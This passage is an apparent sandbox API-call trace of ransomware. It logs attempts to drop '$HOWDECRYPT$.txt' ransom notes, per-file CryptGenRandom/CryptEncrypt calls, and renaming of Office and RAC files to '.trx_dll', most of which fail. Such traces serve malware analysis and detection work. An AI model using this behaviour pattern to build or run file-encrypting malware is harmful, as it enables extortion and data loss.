GetProcessHeap () returned 0x2c0000 [0160.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.419] GetProcessHeap () returned 0x2c0000 [0160.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3dd8 | out: hHeap=0x2c0000) returned 1 [0160.419] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\search\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.419] GetProcessHeap () returned 0x2c0000 [0160.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1e30 | out: hHeap=0x2c0000) returned 1 [0160.420] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\search\\data\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.420] GetProcessHeap () returned 0x2c0000 [0160.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8878 | out: hHeap=0x2c0000) returned 1 [0160.420] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\search\\data\\temp\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.420] GetProcessHeap () returned 0x2c0000 [0160.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84d80 | out: hHeap=0x2c0000) returned 1 [0160.420] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.420] GetProcessHeap () returned 0x2c0000 [0160.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7fda0 | out: hHeap=0x2c0000) returned 1 [0160.420] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.420] GetProcessHeap () returned 0x2c0000 [0160.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1d78 | out: hHeap=0x2c0000) returned 1 [0160.420] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea48 | out: pbBuffer=0x57ea48) returned 1 [0160.420] GetProcessHeap () returned 0x2c0000 [0160.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.421] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea40*=0x30) returned 1 [0160.421] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql4F48.tmp" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\sql4f48.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.421] GetProcessHeap () returned 0x2c0000 [0160.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.421] GetProcessHeap () returned 0x2c0000 [0160.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf380 | out: hHeap=0x2c0000) returned 1 [0160.421] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea48 | out: pbBuffer=0x57ea48) returned 1 [0160.421] GetProcessHeap () returned 0x2c0000 [0160.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.421] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea40*=0x30) returned 1 [0160.421] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql4EBB.tmp" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\sql4ebb.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.421] GetProcessHeap () returned 0x2c0000 [0160.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.421] GetProcessHeap () returned 0x2c0000 [0160.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf2d0 | out: hHeap=0x2c0000) returned 1 [0160.421] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.422] GetProcessHeap () returned 0x2c0000 [0160.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9a78 | out: hHeap=0x2c0000) returned 1 [0160.422] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea40 | out: pbBuffer=0x57ea40) returned 1 [0160.422] GetProcessHeap () returned 0x2c0000 [0160.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.422] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea38*=0x30) returned 1 [0160.422] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.422] GetProcessHeap () returned 0x2c0000 [0160.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.422] GetProcessHeap () returned 0x2c0000 [0160.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84cb8 | out: hHeap=0x2c0000) returned 1 [0160.422] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea38 | out: pbBuffer=0x57ea38) returned 1 [0160.422] GetProcessHeap () returned 0x2c0000 [0160.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.422] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea30*=0x30) returned 1 [0160.422] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.423] GetProcessHeap () returned 0x2c0000 [0160.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.423] GetProcessHeap () returned 0x2c0000 [0160.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08138 | out: hHeap=0x2c0000) returned 1 [0160.423] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea38 | out: pbBuffer=0x57ea38) returned 1 [0160.423] GetProcessHeap () returned 0x2c0000 [0160.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.423] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea30*=0x30) returned 1 [0160.423] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.423] GetProcessHeap () returned 0x2c0000 [0160.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.423] GetProcessHeap () returned 0x2c0000 [0160.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea98f8 | out: hHeap=0x2c0000) returned 1 [0160.423] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea30 | out: pbBuffer=0x57ea30) returned 1 [0160.423] GetProcessHeap () returned 0x2c0000 [0160.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.423] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea28*=0x30) returned 1 [0160.423] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.424] GetProcessHeap () returned 0x2c0000 [0160.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.424] GetProcessHeap () returned 0x2c0000 [0160.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea99b8 | out: hHeap=0x2c0000) returned 1 [0160.424] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.424] GetProcessHeap () returned 0x2c0000 [0160.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84a60 | out: hHeap=0x2c0000) returned 1 [0160.424] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea28 | out: pbBuffer=0x57ea28) returned 1 [0160.424] GetProcessHeap () returned 0x2c0000 [0160.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.424] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea20*=0x30) returned 1 [0160.424] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.424] GetProcessHeap () returned 0x2c0000 [0160.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.424] GetProcessHeap () returned 0x2c0000 [0160.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08068 | out: hHeap=0x2c0000) returned 1 [0160.425] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\rac\\outbound\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.425] GetProcessHeap () returned 0x2c0000 [0160.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9538 | out: hHeap=0x2c0000) returned 1 [0160.425] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.425] GetProcessHeap () returned 0x2c0000 [0160.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef8b8 | out: hHeap=0x2c0000) returned 1 [0160.425] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea20 | out: pbBuffer=0x57ea20) returned 1 [0160.425] GetProcessHeap () returned 0x2c0000 [0160.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.425] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea18*=0x30) returned 1 [0160.425] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.425] GetProcessHeap () returned 0x2c0000 [0160.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.425] GetProcessHeap () returned 0x2c0000 [0160.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4938 | out: hHeap=0x2c0000) returned 1 [0160.426] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.426] GetProcessHeap () returned 0x2c0000 [0160.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3c468 | out: hHeap=0x2c0000) returned 1 [0160.426] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea18 | out: pbBuffer=0x57ea18) returned 1 [0160.426] GetProcessHeap () returned 0x2c0000 [0160.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.426] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea10*=0x30) returned 1 [0160.426] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.426] GetProcessHeap () returned 0x2c0000 [0160.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.426] GetProcessHeap () returned 0x2c0000 [0160.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef7d0 | out: hHeap=0x2c0000) returned 1 [0160.426] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea10 | out: pbBuffer=0x57ea10) returned 1 [0160.426] GetProcessHeap () returned 0x2c0000 [0160.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.426] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea08*=0x30) returned 1 [0160.426] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.427] GetProcessHeap () returned 0x2c0000 [0160.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.427] GetProcessHeap () returned 0x2c0000 [0160.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c807c0 | out: hHeap=0x2c0000) returned 1 [0160.427] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea10 | out: pbBuffer=0x57ea10) returned 1 [0160.427] GetProcessHeap () returned 0x2c0000 [0160.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.427] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea08*=0x30) returned 1 [0160.427] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.427] GetProcessHeap () returned 0x2c0000 [0160.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.427] GetProcessHeap () returned 0x2c0000 [0160.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c806e8 | out: hHeap=0x2c0000) returned 1 [0160.427] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea08 | out: pbBuffer=0x57ea08) returned 1 [0160.427] GetProcessHeap () returned 0x2c0000 [0160.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.434] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea00*=0x30) returned 1 [0160.435] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.435] GetProcessHeap () returned 0x2c0000 [0160.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.435] GetProcessHeap () returned 0x2c0000 [0160.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4698 | out: hHeap=0x2c0000) returned 1 [0160.435] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea08 | out: pbBuffer=0x57ea08) returned 1 [0160.435] GetProcessHeap () returned 0x2c0000 [0160.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.435] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ea00*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ea00*=0x30) returned 1 [0160.435] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.435] GetProcessHeap () returned 0x2c0000 [0160.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.435] GetProcessHeap () returned 0x2c0000 [0160.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80610 | out: hHeap=0x2c0000) returned 1 [0160.436] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea00 | out: pbBuffer=0x57ea00) returned 1 [0160.436] GetProcessHeap () returned 0x2c0000 [0160.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.436] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9f8*=0x30) returned 1 [0160.436] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.436] GetProcessHeap () returned 0x2c0000 [0160.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.436] GetProcessHeap () returned 0x2c0000 [0160.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80538 | out: hHeap=0x2c0000) returned 1 [0160.436] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ea00 | out: pbBuffer=0x57ea00) returned 1 [0160.436] GetProcessHeap () returned 0x2c0000 [0160.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.436] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9f8*=0x30) returned 1 [0160.436] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.436] GetProcessHeap () returned 0x2c0000 [0160.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.436] GetProcessHeap () returned 0x2c0000 [0160.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb45b8 | out: hHeap=0x2c0000) returned 1 [0160.437] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9f8 | out: pbBuffer=0x57e9f8) returned 1 [0160.437] GetProcessHeap () returned 0x2c0000 [0160.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.437] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9f0*=0x30) returned 1 [0160.437] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.437] GetProcessHeap () returned 0x2c0000 [0160.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.437] GetProcessHeap () returned 0x2c0000 [0160.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb44d8 | out: hHeap=0x2c0000) returned 1 [0160.437] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9f8 | out: pbBuffer=0x57e9f8) returned 1 [0160.437] GetProcessHeap () returned 0x2c0000 [0160.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.437] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e9f0*=0x30) returned 1 [0160.437] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.437] GetProcessHeap () returned 0x2c0000 [0160.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.437] GetProcessHeap () returned 0x2c0000 [0160.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb43f8 | out: hHeap=0x2c0000) returned 1 [0160.438] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e9f0 | out: pbBuffer=0x57e9f0) returned 1 [0160.438] 